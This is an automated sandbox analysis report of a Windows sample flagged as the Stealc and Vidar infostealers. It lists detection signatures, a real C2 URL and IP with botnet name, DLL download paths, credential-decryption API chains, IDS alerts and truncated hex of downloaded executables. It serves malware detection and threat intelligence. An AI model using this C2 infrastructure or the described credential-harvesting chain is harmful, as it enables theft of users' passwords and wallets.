Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1540723
MD5:	c3296f6f55ac5db62cc43a0f555a1484
SHA1:	ea6b377af194e98a906c8b2373399d3f6f068522
SHA256:	c63fc85a83f56bec43d9cb08cbcf52a14040dc32c628c22c6bea27b95dac15a1
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.5e0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.5e0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_005E9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_005EC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_005E7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_005E9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_005F8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005F4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_005EDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_005EE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_005EBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005E16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005EF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_005F3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005F38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_005F4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_005EED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005EDE10

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:20 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 